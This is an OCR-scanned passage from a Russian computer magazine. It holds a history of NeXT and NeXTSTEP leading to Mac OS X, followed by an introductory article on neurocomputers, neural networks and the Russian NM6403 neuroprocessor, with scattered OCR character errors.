кетинговые стороны. К ним относились высокая 
стоимость компьютера и дисков для него, пробле- 
мы с магнитооптическим приводом и ряд других. 

За NeXTcube последовала серия NeXTstation, 
в которой использовалось следующее поколение 
процессоров от все той же Motorola и была исклю- 
чена магнитооптика. Компьютер стал более мощ- 
ным и доступным по цене, а за плоский широкий 
корпус его прозвали «коробкой из-под пиццы». 
Улучшившееся соотношение цена/качество позво- 
лило маркетологам начать экспансию в бизнес-сег- 
мент, на корпоративные рынки. Но, несмотря на 
все их усилия, за несколько лет удалось продать 
только 50 тысяч компьютеров. 

В 1992 году начато проектирование новой ли- 
нейки рабочих станций на чипах РомегРС 601. Од- 
нако перспективному мультипроцессорному компь- 
ютеру NeXT RISC Workstation так и не суждено бы- 
ло увидеть свет. В 1993 году компания NeXT прини- 
мает решение прекратить производство компьюте- 
ров и сосредоточиться на разработке программно- 
го обеспечения. Компания меняет имя с NeXT 
Computer Ha NeXT Software. 
> «следующий» софт. Для пробивания дороги 
на рынок Джобс пытался использовать проверен- 
ные в Apple ходы — печатался специализированный 
журнал «NeXTWORLD magazine» и проводилась 
ежегодная выставка NeXTworldExpo (прямой аналог 
MacworldExpo). Однако, несмотря на все ухищрения, 
привлечь крупных вендоров программного обеспе- 
чения на новую платформу не удалось, за исключе- 
нием, разве что, Lotus. Стросс Рэндал в книге «Steve 
Jobs and the NeXT Big Thing» писал, что когда Билла 
Гейтса спросили, будет ли он разрабатывать софт 
для NeXT, он ответил: «Писать для них софт? Я луч- 
ше пописаю на них!» (оригинальная лексика дяди 
Билла сохранена со слов автора книги). 

Тем не менее, энтузиасты-разработчики наш- 
лись. Да, они не написали чудовищных офисных па- 
кетов, мощных музыкальных и графических редак- 
торов. Но именно Ha NeXT были написаны первые 
веб-сервер и браузер. Напомню, что изобретателем 
веба был ученый-математик Тим Бернерс-Ли, раз- 
работавший всемирную паутину для облегчения об- 
мена научными публикациями между яйцеголовы- 
ми по всему миру. Подробности о ветхозаветных 
временах веба ты найдешь во врезке. 

Другим героем NeXT стал Джон Кармак. 
Хоть его игры и были ориентированы на писюки, 
но целевая платформа была слишком слаба для 
того, чтобы разрабатывать на ней же насыщен- 
ные графикой гамесы. Именно на NeXT'ax про- 
ектировались уровни и создавалась неповтори- 
мая атмосфера таких игр, Kak Wolfenstein 3D, 
Doom и Quake. 
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Платформа также отметилась и на поприще про- 
фессиональной графики: компания Cambridge 
Animation Systems разработала первую версию 
знаменитого пакета Animo именно для компьюте- 
ров NeXT. С его помощью были созданы «Алад- 
ДИН», «Чудеса на виражах», «Чип и Дейл», «Игру- 
шечная история» (список можно продолжить еще 
на полстраницы). Нельзя не вспомнить культовый 
векторный редактор Altsys Virtuoso, сегодня изве- 
стный как Adobe FreeHand, а также легендарный 
Pixar Renderman. 

Но главным достижением компании, конечно, 
было не передовое железо, а операционная система 
NeXTSTEP, первая официальная версия которой 
вышла в 1989 году. Есть мнение, что при создании 
этой ОС использовались наработки закрытого с ухо- 
дом Джобса из Apple проекта Pink (перспективная 
объектно-ориенированная ОС для Макинтош), одна- 
ко ни подтверждений, ни опровержений этому до сих 
пор нет. ОС NeXTSTEP представляла собой клон BSD 
UNIX, но использовала в качестве ядра Mach, а в ка- 
честве языка программирования — Objective С. По- 
истине революционный графический интерфейс 
Display Postscript был основан на языке Adobe 
PostScript. Все, что отображалось на дисплее, было 
на самом деле файлом PostScript, — просто праздник 
для профессионналов-полиграфистов. Аналогичная 
концепция спустя почти десять лет была использова- 
на в Mac OS Х (графический интерфейс Оип?) и сей- 
час запланирована для реализации в грядущей вер- 
сии OC Microsoft Vista. Система была портирована на 
различные платформы, в том числе и на Intel, 
но на последнем распространения не получила из-за 
агрессивного маркетинга корпорации Microsoft, впа- 
ривавшей Windows 3.1 всем, кому ни попадя. 

Идеи NeXTSTEP пришлись ко двору в Sun 
Microsystems. Эти компании, в надежде положить 
конец несовместимости различных диалектов 
UNIX, разрабатывают универсальный OPENSTEP 
API, обладающий настоящей кроссплатформен- 
ностью и поддерживающий любую объектно-ориен- 
тированную операционную систему. Так же, как и 
NEXTSTEP, эта среда написана на языке Objective 
С и использует ядро Mach. OPENSTEP был порти- 
рован практически на все OC oT HP-UX до Windows 
МТ. Имеется также и реализация этого API, выпу- 
щенная под лицензией GNU GPL (см. врезку), 
что стало возможным благодаря открытой публика- 
ции стандартов OPENSTEP API. 

Вторым крупным проектом после ОС NexT- 
STEP и первым по финансовой отдаче для NeXT стал 
WebObjects, сервер веб-приложений Java, выросший 
в дальнейшем в мощную интегрированную среду 
разработки. Первая версия сервера была выпущена 
в марте 1996 года и стала первым в мире объектно- 
ориентированным сервером веб-приложений. Среди 
крупнейших клиентов — Disney, Dell Сотрщеги ВВС 
News. Не осталась в стороне и Apple: после приобре- 
тения NeXT на базе WebObjects были построены сай- 
ты Apple Store, онлайновые сервисы „Мас и музы- 
кальный магазин iTunes Store. 


Принципиальные особенности WebObjects — глубо- 
кая ориентация объекта, мощные возможности в 
работе с крупными базами данных и инструменты 
мгновенного прототипирования для создания про- 
тотипов без строчки кода в считанные минуты. Пос- 
кольку объектная концепция создает определенные 
трудности в работе с реляционными базами дан- 
ных, было создано приложение Enterprise Objects 
Modeler, решающее эти проблемы. Благодаря нему 
объекты отображаются в базу данных автоматичес- 
ки и все это без единой строчки кода — писать яв- 
ные обращения к БД больше не нужно! 

WebObjects позволяет создавать веб-прило- 
жения, работающие как в браузере, так и в виде са- 
мостоятельных программ-апплетов. Не прошла ми- 
мо и мода на веб-сервисы — с NOMOLYbIO WebObjects 
можно забодяжить сервис любой сложности. 
> geno NeXTSTEP живет и побеждает. К концу 
90-х в Apple осознали, что MacOS 8 не отвечает 
современным требованиям и ее развитие заходит 
в тупик. Слабыми местами были в первую очередь 
невозможность работы в гетерогенных сетях (без 
платных сторонних утилит) и особенности работы 
с памятью. На каждую программу выделялась 
фиксированная область, которая была недоступ- 
на прочим приложениям и не могла динамически 
меняться. Эта система в усовершенствованном 
виде перешагнула в будущем в девятую версию, 
но уже за несколько лет до этого ее участь была 
предрешена. 

Кандидата на грядущую вакансию стали по- 
дыскивать на стороне. На роль новой операционки 
как нельзя лучше других подходили NeXTSTEP 
и BeOS, бывшие самыми близкими к MacOS идео- 
логически и концептуально и, естественно, лишен- 
ные недостатков архаичной маковской ОСи тех вре- 
мен. Победа в негласном тендере досталась NeXT- 
STEP, предпочтение было отдано благодаря UNIX- 
корням системы, что, с одной стороны, гарантирова- 
ло стабильность и качество, а с другой — предостав- 
ляло в распоряжение Арре огромную армию разра- 
ботчиков. Кроме того, NeXTSTEP была частично 
совместима с МакОС — она позволяла читать дис- 
кеты, монтировать сетевые и SCSI-auckn. 

В 1996 году «яблочники» приобретают NeXT 
и вобстановке строгой секретности запускают про- 
ект Rhapsody (кодовое наименование новой, деся- 
той версии операционной системы для Маков). 
На реализацию этого проекта ушло три года упор- 
ного труда разработчиков, в результате чего каж- 
дый желающий смог получить «UNIX с человечес- 
ким лицом» всего за 129 долларов. Дизайнеры ин- 
терфейса постарались на славу — за красотами 
фантастического интерфейса Aqua невозможно 
было не только узреть юниксовые корни, но и даже 
опознать родителя системы, ОС NeXTSTEP. В 1999 
году гадкий утенок NeXTSTEP (не поймите непра- 
вильно, эта метафора навеяна всего лишь разни- 
цей между графическими интерфейсами) превра- 
щается в прекрасную Mac OS Х. Так кто там не ве- 
рит в жизнь после смерти? © 


TIM-BERNES-LEE 
ДИРЕКТОР WWW КОНСОРЦИУМА 


В массах распространено заблуждение, что первым 
браузером был Mosaic. Первым, все-таки, был 
WorldWideWeb, браузер «от создателя всемирной 
паутины» сэра Тима Бернерс-Ли, а «Мозаику» 
зарелизили спустя три года после него. 

Во избежание путаницы с начинавшим входить 

в обиход термином «всемирная паутина» автор дал 
браузеру вместо WorldWideWeb новое имя Nexus. 
Почему же он был создан именно на платформе 
Next? Логика подсказывает, что потому, что эти 
машины были широко распространены в научной 
среде тех времен. Вот что говорит об этом сам 
автор программы (цитата с его странички на сайте 
http://w3c.org): «Я писал эту программу на Next'e. 

В этом было преимущество, поскольку были 
доступны отличные инструменты разработчика, да и 
в целом это была великолепная вычислительная 
среда. 

Действительно, я смог сделать за пару 
месяцев то, на что ушло бы больше года на 
других платформах. Application builder (среда 
разработки для Мех!) позволил создавать 
интерфейс так быстро, насколько вы могли бы 
себе это представить. Для его разработки 
применялись готовые элементы, которые 
использовались при создании браузера в wysi- 
м/уд-режиме. Мне оставалось только добавить 
гипертекст, как подкласс объекта текст». 

Вместе с браузером Бернерс-Ли разработал 
первую версию протокола http, концепцию единой 
системы адресации url и собственно язык 
разметки гипертекста html. К концу 1990 года OH 
же разработал первый в мире сайт для института 
Cern, в котором трудился. Сайт состоял из одной 
странички — институтского телефонного 
справочка. 
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нейробудущее 
наступает 


ПРИСТАВКА «НЕИРО-» НЫНЧЕ В МОДЕ. ТУТ ТЕБЕ И 
НЕЙРОХИРУРГИ, И НЕЙРОННЫЕ СЕТИ, И НЕЙРО- 
ЛИНГВИСТИЧЕСКОЕ ПРОГРАММИРОВАНИЕ — ОДНИМ 
СЛОВОМ, МНОГО ЧЕГО. НО СПРОСИ У ДЕСЯТКА 
ЧЕЛОВЕК, ЧТО ТАКОЕ НЕЙРОКОМПЬЮТЕР — 
ПОЛУЧИШЬ ДЕСЯТЬ РАЗНЫХ ОТВЕТОВ. ПО-МОЕМУ, 
ПРИШЛО ВРЕМЯ РАЗОБРАТЬСЯ. ЕСЛИ НАШИ МНЕНИЯ 
СОВПАДАЮТ — ЧИТАЙ 

Шестой 

6th@mail.ru 


Прежде чем начать, давай сразу определимся, что 
такое нейрокомпьютер. Из самого названия понят- 
но, что речь идет о чем-то, связанном с нейронами, 
причем это что-то умеет, как минимум, выполнять 
четыре арифметических действия. Но дело в том, 
что нейроны могут быть настоящими, а могут иску- 
сственными, так что за словом «нейрокомпьютер» 
скрываются два абсолютно разных понятия. Первое 
из них — так называемый wetware computer, состо- 
ящий из живых нейронов, точно таких же, какие ра- 
ботают в твоем мозге, когда ты читаешь эту статью. 
Второе — обыкновенный с виду компьютер, прин- 
цип действия которого основан на нейронных сетях. 
Мы рассмотрим оба вида. 

> | неискусственный искусственный интеллект. 
Все началось с того, что доктор Уильям Дитто понял 
причину неудач, преследующих Т-индустрию в об- 
ласти создания искусственного интеллекта. 

Идея профессора была проста и элегантна — 
создать искусственный интеллект из неискусствен- 
ных, то есть органических элементов. К чему тратить 
время и деньги, пытаясь уменьшить размер транзис- 
тора, когда природа щедро снабдила всех нас мощ- 
нейшими вычислительными машинами из всех ког- 
да-либо созданных? Будучи человеком трезвого ума, 
Дитто не стал сразу же пытаться собрать из кусочков 
мозг живого человека, а ограничился пиявками. Как 
объяснил сам доктор, нервные клетки у пиявок прос- 
то замечательные — большие, с хорошо известной 
структурой, к тому же легко обучаются. Соединив 
два нейрона, профессору удалось заставить их скла- 
дывать небольшие числа. Результат более чем 
скромный, но сам факт успешного обучения сети, ос- 
нованной на живых нервных клетках, открывает ог- 
ромные перспективы. 

Традиционные компьютеры основаны на чет- 
кой бинарной логике и позволяют найти решение 
поставленной задачи лишь в том случае, когда за- 
даны все исходные данные и связи между ними. 
Механизм самоорганизации живых нейронов, воз- 
можно, поможет сделать большой шаг к успешной 
реализации искусственного интеллекта, так как 
позволит биокомпьютеру находить решение зада- 
чи, основываясь на неполных данных — то есть 
в точности так же, как работает наш с тобой мозг. 
А команда Дитто уже учит свой «пиявочный мозг» 
умножению, так что не за горами тот день, когда 
в названия типа SoundBlaster Live будет вклады- 
ваться несколько иной смысл :). 
>» — история. Второй вариант прочтения термина 
«нейрокомпьютер» — компьютер, поддерживающий 
реализацию нейронных сетей на уровне архитекту- 
ры. Прежде чем продолжать, было бы неплохо ра- 
зобраться в самих ИНС — искусственных нейронных 
сетях. Чем мы и займемся. Удивительно, но история 
искусственных нейронных сетей насчитывает боль- 
ше ста лет. Еще в конце 19-го века, пытаясь разоб- 
раться в базовых принципах человеческого мышле- 
ния, некоторые ученые высказывали идеи, порази- 
тельно напоминающие современные представления 
о НС. Начало серьезных исследований в области 


нейронных сетей связано с именами Фридриха Хайе- 
ка и Дональда Хэбба, которые первыми выдвинули 
теорию обучения человеческого мозга, как процес- 
са формирования связей между нейронами. О за- 
рождении технологии искусственных НС можно го- 
ворить начиная с 1943 года, когда нейрофизиолог 
Уоррен Маккалох и математик Уолтер Питгс опубли- 
ковали статью, описывающую простейшую модель 
электронного нейрона. Открывающиеся перспекти- 
вы будоражили воображение, и исследования пош- 
ли полным ходом. В 1957 году Франк Розенблатт 
разработал принципиальную схему искусственного 
нейрона, названную перцептроном, и предложил 
правила обучения сети, составленной из подобных 
элементов. В 1969 году небезызвестный (надеюсь) 
Марвин Минский публикует разгромную книгу «Пер- 
цептроны», которая камня на камне не оставляет от 
надежд, возлагаемых на нейронные сети. 

Минский строго доказывает ограниченность 
класса задач, решаемых перцептронами, приводя 
в пример функцию ХОВ, которой такая сеть неспо- 
собна обучиться в принципе. Восторги утихают, 
и область ИНС отправляется на задворки науки. 
Но энтузиасты продолжают работать. 

В 1975 году Кунихико Фукушима представля- 
ет ученому миру когнитрон — первую многослой- 
ную нейронную сеть, лишенную большинства не- 
достатков перцептрона. Былые надежды обретают 
новую жизнь. Эстафету подхватил Джон Хопфилд, 
в 1982 году разработав сеть, позволяющую пере- 
давать сигналы в обоих направлениях, тогда как до 
этого момента движение импульса в сети было иск- 
лючительно односторонним. И, наконец, в середи- 
не восьмидесятых скептики были безжалостно 
уничтожены кованым сапогом параллельных вы- 
числений (1985) и железной перчаткой сетей с об- 
ратным распространением ошибки (1986). В насто- 
ящее время в потенциале нейронных сетей не сом- 
невается уже никто. Возможно, эта технология и не 
приведет нас к созданию искусственного интеллек- 
та, но то, что разработки, включающие в себя НС, 
используются сегодня практически во всех облас- 
тях — от постановки диагноза и распознавания ре- 
чи, до предсказания погоды и наведения ракет — 
неоспоримый факт. 
>» — нейронные сети за 21 минуту. Не знаю, Kak Te- 
бя, а меня всегда умиляли книжки с заголовками 
вроде «Visual С за 21 день», «Освой ядерную фи- 
зику за 24 часа», «Биополимерный синтез для чай- 
ников» и пр. Это из серии «Как заработать милли- 
он за один день? Как скинуть 10 кг за час?» — чи- 
тайте это и многое другое в нашем замечательном 
журнале «А черт его знает». Так что не надейся: 
эксперт по нейронным сетям из тебя если и полу- 
чится, то уж точно не сразу после прочтения этой 
статьи :). Но раобраться с основами вполне реаль- 
но. Начнем — в лучших традициях учебников 
по НС — с рассмотрения нейрона биологического, 
то есть живого. 

Если не вдаваться в подробности, взаимо- 
действие нейронов в нашем мозге протекает до- 
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вольно просто: тело нейрона отправляет импульсы 
по аксону и получает сигналы других нейронов пос- 
редством дендритов. Области соединения — си- 
напсы — могут ослаблять или усиливать передава- 
емый сигнал, причем величина коэффициента из- 
менения в процессе обучения непостоянна, что 
позволяет нейронной сети сохранять информацию 
о предыдущих состояниях. То есть чем большее ко- 
личество раз ты выполняешь какое-то действие, 
тем более «проторенной» становится дорожка 
между нейронами, и, соответственно, тем более 
легким для тебя становится выполнение этого 
действия. Все просто. Искусственный же нейрон 
устроен еще проще. 

На вход нейрона подаются сигналы 
х(1)...х(п), каждый из которых умножается на со- 
ответствующее значение W(i) — так называемый 
вес синапса. Уже умноженные сигналы складыва- 
ются в сумматоре, к ним, по желанию, добавляет- 
ся смещение b, и получившийся сигнал отправля- 
ется на вход передаточной функции. Суть переда- 
точной функции или, как ее еще называют, функ- 
ции активации, заключается в некотором преоб- 
разовании полученной суммы $ в окончательный 
выход нейрона у. Подходящих функций существу- 
ет много, одни используются чаще, другие — ре- 
же. Например, пороговая функция смотрит, пре- 
высило ли $ определенный порог (отсюда и назва- 
ние), и пока $ меньше этого значения, на выход 
нейрона идет ноль. А линейная функция выполня- 
ет очень сложное преобразование вида y=S, то 
есть вообще ничего не меняет :). Вот этот малень- 
кий элемент и представляет собой основу всемо- 
гущих нейронных сетей. 

Процесс обучения ИНС начинается с созда- 
ния обучающей выборки. Скажем, необходимо на- 
учить сеть выполнять операцию сложения. На вхо- 
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ды сети подаются числа 1 и 2. Сеть прогоняет эти 
сигналы по всем своим нейронам и выдает ответ — 
100! Мягко указываем на верный ответ: 1+2=3. 
В ответ сеть немного изменяет коэффициенты из- 
менения сигнала. Кстати, изначально веса синап- 
сов задаются случайным образом. Даем сети чис- 
ла2 и 3, получаем ответ — 500 :). Указываем пра- 
вильный вариант — 2+3=5, и сеть снова немного 
подстраивает веса. Прежде чем сеть начнет давать 
верные ответы, может понадобиться сотня, тысяча, 
а то десяток тысяч повторений. Зато потом наша 
ИНС будет щелкать подобные задачи как орешки. 
Нет большого смысла учить сеть складывать чис- 
ла, но давай вспомним всем известный FineReader. 
Принцип его работы в точности такой же: на вход 
сети поступают различные варианты написания 
буквы до тех пор, пока сеть не научится отличать 
эту букву от всех остальных. Вооружившись этими 
знаниями, можно, наконец, приступать к сердцу Te- 
мы — нейрокомпьютерам. 
>  нейрокомпьютеры. Разумеется, нейронную 
сеть можно реализовать на обычном компьютере, 
из тех, что стоят на твоем и моем столе. Несложно 
написать структуру сети, чуть сложнее написать ал- 
горитм обучения, но задача, в принципе, тривиаль- 
ная. Для чего же тогда проектировать дорогостоя- 


или преобразователь? В общем, с его 
помощью можно преобразовывать 
мысли в физические действия 


щие нейропроцессоры? В 1966 году Майкл Флинн 
предложил классифицировать вычислительные сис- 
темы по тому, каким количеством данных может 
оперировать процессор, обрабатывая одну команду. 
По Флинну, существует четыре типа компьютеров: 


1 5150 — SINGLE INSTRUCTION SINGLE 
DATA — ОДНА ИНСТРУКЦИЯ — ОДИН 
ЭЛЕМЕНТ ДАННЫХ. К ЭТОМУ КЛАССУ ОТ- 
НОСЯТСЯ СИСТЕМЫ, В КОТОРЫХ ОДНА 
ИНСТРУКЦИЯ ПОЗВОЛЯЕТ РАБОТАТЬ 
ТОЛЬКО С ОДНИМ ЭЛЕМЕНТОМ ДАННЫХ, 
ХРАНЯЩИМСЯ В ПАМЯТИ. ПРИНЦИП 
ПОЛНОСТЬЮ ОТВЕЧАЕТ ФОН НЕЙМАНО- 
ВСКОЙ ПАРАДИГМЕ, И НАШИ С ТОБОЙ 
КОМПЬЮТЕРЫ (НУ, МОЙ ТОЧНО) ЯВЛЯ- 
ЮТСЯ ИМЕННО $1$0-МАШИНАМИ. 


80 СПЕЦ-ТОР!С СПЕЦ 01-07 


2 MISD — MULTIPLE INSTRUCTION SINGLE 
DATA — МНОГО ИНСТРУКЦИЙ — ОДИН 
ЭЛЕМЕНТ ДАННЫХ. ЭТО ПРИМЕР АРХИ- 
ТЕКТУРЫ ПАРАЛЛЕЛЬНЫХ ВЫЧИСЛЕ- 
НИЙ, КОГДА МНОЖЕСТВО ПРОЦЕССО- 
РОВ ВЫПОЛНЯЮТ РАЗЛИЧНЫЕ ОПЕРА- 
ЦИИ НАД ОДНИМИ И ТЕМИ ЖЕ ДАННЫМИ. 
МАШИНЫ ТАКОГО ТИПА ЧРЕЗВЫЧАЙНО 
РЕДКИ, ТАК КАК ПРАКТИЧЕСКИ БЕСПО- 
ЛЕЗНЫ. 


3 SIMD — SINGLE INSTRUCTION, MULTIPLE 
DATA — ОДНА ИНСТРУКЦИЯ — МНОГО 
ДАННЫХ. ЭТО ТАК НАЗЫВАЕМЫЕ ВЕК- 
ТОРНЫЕ ПРОЦЕССОРЫ, ПОЗВОЛЯЮЩИЕ 
ОБРАБАТЫВАТЬ ЦЕЛЫЕ МАССИВЫ ДАН- 
НЫХ ОДНОЙ КОМАНДОЙ. $1МО-МАШИНЫ 
ОЧЕНЬ ВОСТРЕБОВАНЫ В ОБЛАСТЯХ, 
ГДЕ ТРЕБУЮТСЯ ТРУДОЕМКИЕ ВЫЧИС- 
ЛЕНИЯ — РАЗНООБРАЗНЫЕ ПРОГНОЗЫ, 
ЗАДАЧИ РАСПОЗНАВАНИЯ, НЕЙРОННЫЕ 
СЕТИ. СТОП! НЕЙРОННЫЕ СЕТИ? ДА. 
ВТОРОЕ НАЗВАНИЕ ВЕКТОРНЫХ ПРО- 
ЦЕССОРОВ — НЕЙРОННЫЕ. 


4 ММО — MULTIPLE INSTRUCTION MULTI- 
PLE DATA — МНОГО ИНСТРУКЦИЙ, MHO- 
ГО ДАННЫХ. МАШИНЫ ЭТОГО КЛАССА 
ЛЕГКО ПРЕДСТАВИТЬ НА ПРИМЕРЕ ИН- 
ТЕРНЕТА, КАК СОВОКУПНОСТИ ЛОКАЛЬ- 
НЫХ СЕТЕЙ, КАЖДАЯ ИЗ КОТОРЫХ ВЫ- 
ПОЛНЯЕТ СВОЮ ЗАДАЧУ. 


Как ты уже понял, мы будем говорить о SIMD-npo- 
цессорах. Одним из замечательнейших свойств 
нейронных сетей является их врожденная парал- 
лельность — для вычисления значения выхода вто- 
рого нейрона совсем не обязательно знать выход 
первого. Глупо моделировать параллельную струк- 
туру на $1$О9-процессоре, который физически 
не приспособлен для такого рода вычислений. 
$1МО-архитектура же, напротив, словно создана 
для воплощения наших самых смелых грез в об- 
ласти нейронных сетей. 

Признанными лидерами в области нейро- 
компьютерных технологий являются такие гиганты, 
как Texas Instruments и Motorola. 

Обе компании отлично зарекомендовали Ce- 
бя и почивали на лаврах, лишь изредка вздраги- 
вая при слухах о новой разработке их единствен- 
ных конкурентов — Analog Devices. Во всяком слу- 
чае, так было до 98-го года, то есть до того момен- 
та, пока на рынке не появился еще один «высо- 
копроизводительный специализированный мик- 
ропроцессор, сочетающий в себе черты двух сов- 
ременных архитектур: VLIW и SIMD. Назывался 
процессор NM6403. Или Л1879ВМ1. Да — наш, 
отечественный! 

НТЦ «Модуль» знаменит именно благодаря 
этому детищу, но мало кто знает предысторию его 
появления. Центр был основан в 1990 году двумя 
большими предприятиями — НПО «Вымпел» 


иНИИ Радиоприборостроения. Основной задачей 
учрежденного НТЦ была разработка нейросете- 
вых алгоритмов, в основном, в области распозна- 
вания образов. Сначала для реализации своих 
идей центр вполне обходился существующими 
техническими средствами: так, до 96-го года ос- 
новной платформой исследований «Модуля» был 
процессор небезызвестных Texas Instruments — 
TMS320C40. 

Но растущий потенциал НТЦ требовал все но- 
вых и новых архитектурных решений, и в 1996 году 
был запущен проект под кодовым названием 
NeuroMatrix — проект создания нового, уникального 
нейропроцессора. Работа завершилась в 1998 году, 
когда с завода Samsung пришла первая партия про- 
цессоров NM6403, изготовленных по проекту рос- 
сийских инженеров. Первые же официальные тесты 
подтвердили, что работа была проделана не зря — 
Л1879ВМ1 значительно опережал своих конкурен- 
тов по производительности и к тому же являлся 
единственным в мире 64-разрядным О$Р-процессо- 
ром на тот момент. При тактовой частоте 40 МГц, 
в определенных задачах NM6403 оказывался на од- 
ном уровне с 50-мегагерцовым Alpha DEC! На базе 
созданного устройства был изготовлен РС!-модуль 
MC4, включающий сам процессор и два банка памя- 
ти по 2 Мб каждый. 

И в завершение в «Модуле» построили спе- 
циальную версию этой платы — TIM (Texas 
Instruments Module), выполненную по стандартам 
TI, как тонкий намек, что с этого момента партнеры 
меняются ролями :). Ну, до этого, конечно, еще да- 
леко, но зачин весьма успешен. 

Разумеется, с конечным продуктом постав- 
ляются средства разработки в виде базового 
программного обеспечения, системных библиотек, 
компилятора, отладчика и много чего еще. Если ты 
знаешь ассемблер Интеловских процессоров 
и немного знаком с параллельными вычисления- 
ми, то ассемблер NM6403 покажется довольно 


простым. Кстати, для того чтобы опробовать 
NM6403 в деле и начать гордо называть себя ней- 
рокодером, вовсе не обязательно покупать доро- 
гостоящее оборудование. Достаточно скачать эму- 
лятор процессора (см. ссылки), руководство к не- 
му и— вперед! 

Разумеется, ребята из «Модуля» не остано- 
вились на достигнутом и вскоре разработали сле- 
дующий экземпляр — 1879BM2, он же NM6404. Ho- 
вый процессор работает на частоте 80 МГц и име- 
ет 2-мегабитное ОЗУ. Системы команд двух брать- 
ев полностью совместимы, но при использовании 
второго разработчики обещают увеличение быст- 
родействия в 2-3 раза. 
>» = зачем? Область применения нейропроцессо- 
ров впечатляет. Если оставить в стороне решение 
волноводных уравнений, аддитивную факториза- 
цию и прочие интересные вещи, среди существую- 
щих разработок можно отметить следующие: 


— ОБРАБОТКА ВИДЕОИЗОБРАЖЕНИЙ. 
ЭТО И ОХРАННЫЕ СИСТЕМЫ, ОТ КОТО- 
РЫХ ТРЕБУЕТСЯ НЕ ТОЛЬКО ПРОСТАЯ 
РЕГИСТРАЦИЯ ФАКТА ДВИЖЕНИЯ НА ЭК- 
РАНЕ, НО И ИДЕНТИФИКАЦИЯ САМОГО 
ДВИЖУЩЕГОСЯ ОБЪЕКТА, И СИСТЕМЫ 
НАВЕДЕНИЯ РАКЕТ, ОРИЕНТИРУЮЩИХ- 
СЯ НА ВИЗУАЛЬНУЮ ЦЕЛЬ, И СИСТЕМЫ 
КООРДИНАЦИИ АРТИЛЛЕРИЙСКОГО ОГ- 
НЯ, А ТАКЖЕ МНОГОЕ ДРУГОЕ. НАПРИ- 
МЕР, УЖЕ СУЩЕСТВУЕТ АВТОМАТИЗИ- 
РОВАННАЯ СИСТЕМА АНАЛИЗА ТРАНС- 
ПОРТНОГО ПОТОКА TRAFFICMONITORC, 
ПОЗВОЛЯЮЩАЯ ОПРЕДЕЛЯТЬ ТИП 
И СКОРОСТЬ МЧАЩИХСЯ ПО ТРАССЕ 
МАШИН. 


Сюда же можно отнести задачи создания машин- 
ного зрения — одной из основных проблем робото- 
техники. 


НЕЙРОНЫ 
В СССР 


Работы над созданием полноценного 
нейрокомпьютера, то есть компьютера, 
реализующего нейронную сеть на 
уровне железа, начались в СССР с се- 
редины 80-х годов. Первый такой ком- 


пьютер был разработан в 1988 году 
под руководством 9.М. Куссуля. Благо- 
даря железному занавесу, каждый вин- 
тик машины и каждый байт программы 
были отечественного производства. 
Ав1992 году появилась новая модель, 
элементная база которой была произ- 
ведена в Японии фирмой Wacom. 

В 1984 году по заказу Минобороны 
СССР в Институте Кибернетики был 
создан робот под названием МАВР. 


На роботе планировалось исследовать 
в полевых условиях эффективность 
существующих алгоритмов автоном- 
ного движения в условиях пересечен- 
ной местности. Догадайся, чем был 
электронный мозг робота? Конечно 
нейронной сетью! Подробнее 

о МАВР'е и сопутствующих разработ- 
ках можно почитать в замечательной 
книге Н.М. Амосова «Нейрокомпьюте- 
ры и интеллектуальные роботы». 
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~~ ОБРАБОТКА СТАТИЧЕСКИХ ИЗОБРАЖЕ- 
НИЙ. ОСНОВНАЯ ЗАДАЧА ЭТОГО НАП- 
РАВЛЕНИЯ — ОБЕСПЕЧИТЬ ВЫСОКОКА- 
ЧЕСТВЕННУЮ ОБРАБОТКУ СНИМКОВ, 
ПОЛУЧАЕМЫХ СО СПУТНИКОВ, НА КОТО- 
РЫХ ИСКОМЫЕ ОБЪЕКТЫ МОГУТ ИМЕТЬ 
РАЗМЕР В ОДИН-ДВА ПИКСЕЛЯ. 


— ОБНАРУЖЕНИЕ АВИАЦИИ. НЕЙРОННЫЕ 
СЕТИ И СООТВЕТСТВУЮЩИЕ ПРОЦЕС- 
СОРЫ ИДЕАЛЬНО ПОДХОДЯТ ДЛЯ РЕШЕ- 
НИЯ ЗАДАЧИ ОБНАРУЖЕНИЯ И ИДЕНТИ- 
ФИКАЦИИ ЛЕТАТЕЛЬНЫХ АППАРАТОВ 
ПО ИЗДАВАЕМОМУ ИМИ ЗВУКУ. 


— СОЗДАНИЕ ТЕПЛОВИЗОРОВ. ПОСТРОЕ- 
НИЕ ИЗОБРАЖЕНИЯ В ИНФРАКРАСНОЙ 
ОБЛАСТИ СПЕКТРА (А ЛЯ «ХИЩНИК») 
УЖЕ ДАВНО СТАЛО ОБЫДЕННОЙ ЗАДА- 
ЧЕЙ, НО УВЕЛИЧЕНИЕ РАЗМЕРОВ МАТ- 
РИЦЫ ИЗОБРАЖЕНИЯ СОПРЯЖЕНО 
С РЕЗКИМ ВОЗРАСТАНИЕМ СЛОЖНОСТИ 
ОБРАБОТКИ, А ТАК КАК ЭЛЕМЕНТЫ МАТ- 
РИЦЫ МОГУТ ОБРАБАТЫВАТЬСЯ ПАРАЛ- 
ЛЕЛЬНО, НЕЙРОПРОЦЕССОРЫ ОКАЗЫ- 
ВАЮТСЯ ПОЛЕЗНЫМИ И ЗДЕСЬ. 


™ КРИПТОГРАФИЯ. ХОРОШИЕ КРИПТОС- 
ТОЙКИЕ МЕХАНИЗМЫ ШИФРОВАНИЯ СУ- 
ЩЕСТВУЮТ. ЕДИНСТВЕННАЯ ПРОБЛЕМА 
ЗАКЛЮЧАЕТСЯ В ТОМ, ЧТО ИХ РЕАЛИЗА- 
ЦИИ С БОЛЬШИМ РАЗМЕРОМ КЛЮЧА ВЫ- 
ПОЛНЯЮТСЯ КРАЙНЕ МЕДЛЕННО, ИЗ-ЗА 
ЧЕГО ПРИХОДИТСЯ ПОЛЬЗОВАТЬСЯ МЕ- 
НЕЕ НАДЕЖНЫМИ МЕТОДАМИ ЗАЩИТЫ. 
АДАПТИРОВАВ АЛГОРИТМЫ ЭТИХ МЕХА- 
НИЗМОВ ДЛЯ ПАРАЛЛЕЛЬНОЙ ОБРАБОТ- 
КИ (ОПТИМАЛЬНЫМ ВАРИАНТОМ ЯВЛЯ- 
ЮТСЯ БЛОЧНЫЕ ШИФРЫ) И ИСПОЛЬЗУЯ 
ВЕКТОРНЫЕ ПРОЦЕССОРЫ, МОЖНО 
УМЕНЬШИТЬ ЭФФЕКТИВНОЕ ВРЕМЯ 
ШИФРОВАНИЯ ВО МНОГО РАЗ. К ЗАДАЧЕ 
ШИФРОВАНИЯ ИНФОРМАЦИИ ПЛОТНО 
ПРИМЫКАЕТ ЗАДАЧА ЕЕ КОДИРОВАНИЯ. 
